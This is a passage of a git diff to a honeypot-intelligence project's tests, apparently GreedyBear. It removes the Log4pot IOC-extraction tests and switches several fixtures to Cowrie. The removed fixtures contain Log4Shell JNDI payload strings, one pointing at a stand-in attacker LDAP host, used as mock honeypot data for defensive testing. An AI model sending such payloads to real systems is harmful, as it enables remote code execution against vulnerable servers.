         self.assertGreaterEqual(result, 0)
 
 
-class TestLog4potE2E(E2ETestCase):
-    """E2E tests for Log4pot extraction through the real pipeline."""
-
-    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
-    def test_log4pot_extracts_exploit_ioc(self, mock_scores):
-        """
-        E2E: Log4pot exploit event → real Log4potExtractionStrategy → IOC.
-        """
-        pipeline = self._create_pipeline_with_real_factory()
-
-        log4pot_hits = [
-            MockElasticHit(
-                {
-                    "src_ip": "198.51.100.10",
-                    "type": "Log4pot",
-                    "reason": "exploit",
-                    "correlation_id": "corr123",
-                    "deobfuscated_payload": "${jndi:ldap://evil.attacker.com:1389/a}",
-                    "timestamp": "2025-01-01T08:00:00",
-                    "dest_port": 8080,
-                }
-            ),
-        ]
-        pipeline.elastic_repo.search.return_value = [log4pot_hits]
-        pipeline.ioc_repo.is_empty.return_value = False
-        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
-        pipeline.ioc_repo.get_ioc_by_name.return_value = None
-
-        mock_ioc = self._create_mock_ioc("198.51.100.10")
-        with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
-            mock_add.return_value = mock_ioc
-            result = pipeline.execute()
-
-        self.assertGreaterEqual(result, 0)
-
-    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
-    def test_log4pot_non_exploit_skipped(self, mock_scores):
-        """
-        E2E: Log4pot request (non-exploit) → should not extract payload IOC.
-        """
-        pipeline = self._create_pipeline_with_real_factory()
-
-        log4pot_hits = [
-            MockElasticHit(
-                {
-                    "src_ip": "10.0.0.50",
-                    "type": "Log4pot",
-                    "reason": "request",  # Not an exploit
-                    "correlation_id": "req123",
-                    "timestamp": "2025-01-01T10:00:00",
-                }
-            ),
-        ]
-        pipeline.elastic_repo.search.return_value = [log4pot_hits]
-        pipeline.ioc_repo.is_empty.return_value = False
-        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
-        pipeline.ioc_repo.get_ioc_by_name.return_value = None
-
-        mock_ioc = self._create_mock_ioc("10.0.0.50")
-        with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
-            mock_add.return_value = mock_ioc
-            result = pipeline.execute()
-
-        # Should still process scanner IOC but not payload
-        self.assertGreaterEqual(result, 0)
-
-
 class TestGenericE2E(E2ETestCase):
     """E2E tests for generic/unknown honeypot extraction."""
 
@@ -198,7 +131,7 @@ class TestMixedHoneypotE2E(E2ETestCase):
     @patch("greedybear.cronjobs.repositories.CowrieSessionRepository")
     def test_mixed_honeypots_use_correct_strategies(self, mock_session_repo, mock_scores):
         """
-        E2E: Mixed Cowrie + Log4pot + Generic → correct strategy for each.
+        E2E: Mixed Cowrie + Dionaea → correct strategy for each.
         """
         pipeline = self._create_pipeline_with_real_factory()
 
@@ -213,16 +146,6 @@ def test_mixed_honeypots_use_correct_strategies(self, mock_session_repo, mock_sc
                     "dest_port": 22,
                 }
             ),
-            MockElasticHit(
-                {
-                    "src_ip": "10.2.2.2",
-                    "type": "Log4pot",
-                    "reason": "exploit",
-                    "correlation_id": "log4_corr",
-                    "deobfuscated_payload": "${jndi:ldap://test.com:1389/a}",
-                    "timestamp": "2025-01-01T10:00:01",
-                }
-            ),
             MockElasticHit(
                 {
                     "src_ip": "10.3.3.3",
@@ -413,8 +336,9 @@ def test_multiple_honeypots_ioc_content_verified(self, mock_scores):
             MockElasticHit(
                 {
                     "src_ip": "10.0.0.3",
-                    "type": "Log4pot",
-                    "path": "/api",
+                    "type": "Cowrie",
+                    "session": "sess3",
+                    "eventid": "cowrie.session.connect",
                     "@timestamp": "2025-01-15T12:00:00",
                 }
             ),
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_factory.py b/tests/greedybear/cronjobs/test_extraction_pipeline_factory.py
index ca658850..3285a926 100644
--- a/tests/greedybear/cronjobs/test_extraction_pipeline_factory.py
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_factory.py
@@ -22,16 +22,6 @@ def test_factory_creates_cowrie_strategy_for_cowrie(self):
 
         self.assertIsInstance(strategy, CowrieExtractionStrategy)
 
-    def test_factory_creates_log4pot_strategy_for_log4pot(self):
-        """Factory should return Log4potExtractionStrategy for 'Log4pot' honeypot."""
-        from greedybear.cronjobs.extraction.strategies import Log4potExtractionStrategy
-        from greedybear.cronjobs.extraction.strategies.factory import ExtractionStrategyFactory
-
-        factory = ExtractionStrategyFactory(MagicMock(), MagicMock())
-        strategy = factory.get_strategy("Log4pot")
-
-        self.assertIsInstance(strategy, Log4potExtractionStrategy)
-
     def test_factory_creates_generic_strategy_for_unknown(self):
         """Factory should return GenericExtractionStrategy for unknown honeypots."""
         from greedybear.cronjobs.extraction.strategies import GenericExtractionStrategy
@@ -67,9 +57,6 @@ def test_factory_strategies_have_correct_honeypot_name(self):
         cowrie_strategy = factory.get_strategy("Cowrie")
         self.assertEqual(cowrie_strategy.honeypot, "Cowrie")
 
-        log4pot_strategy = factory.get_strategy("Log4pot")
-        self.assertEqual(log4pot_strategy.honeypot, "Log4pot")
-
         generic_strategy = factory.get_strategy("Heralding")
         self.assertEqual(generic_strategy.honeypot, "Heralding")